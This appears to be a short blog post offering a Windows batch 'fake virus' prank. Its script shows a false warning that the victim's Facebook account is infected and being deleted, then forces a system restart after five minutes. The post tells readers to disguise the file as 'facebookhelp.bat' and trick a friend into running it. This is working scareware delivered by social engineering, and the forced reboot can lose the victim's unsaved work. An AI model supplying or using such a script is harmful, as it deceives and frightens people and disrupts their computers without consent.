Fake virus for making fun with your friends

Fake virus what i mean?
   This is not at all virus.  This is not at all make any effect.  It just shut down your friend system for only once and show  " your facebook account is hacked"(for fun only).

What is the code?
   So far we create a lot of virus using Batch programming .  This time also we are going to use our Batch programming.



Code:


@echo off
msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX!
PAUSE
shutdown -r -t 300 -c " SORRY!!! YOUR FACEBOOK ACCOUNT ARE NOW BEING DELETED !!! PLEASE WAIT ..........."


What you should do with this code?
      Copy this code and paste in notepad
       Save the file with .bat extension.(for eg: facebookhelp.bat)
       Now sent this file to your friend and ask to click.

What this will do?
  It will show first  "WARNING VIRUS DETECTED!!!!! AFTE.........." msg in cmd
  Then it will shutdown.  Before shutdown it will show "SORRY!!! YOUR ....." msg in cmd .

Comments

Post a Comment

Popular Posts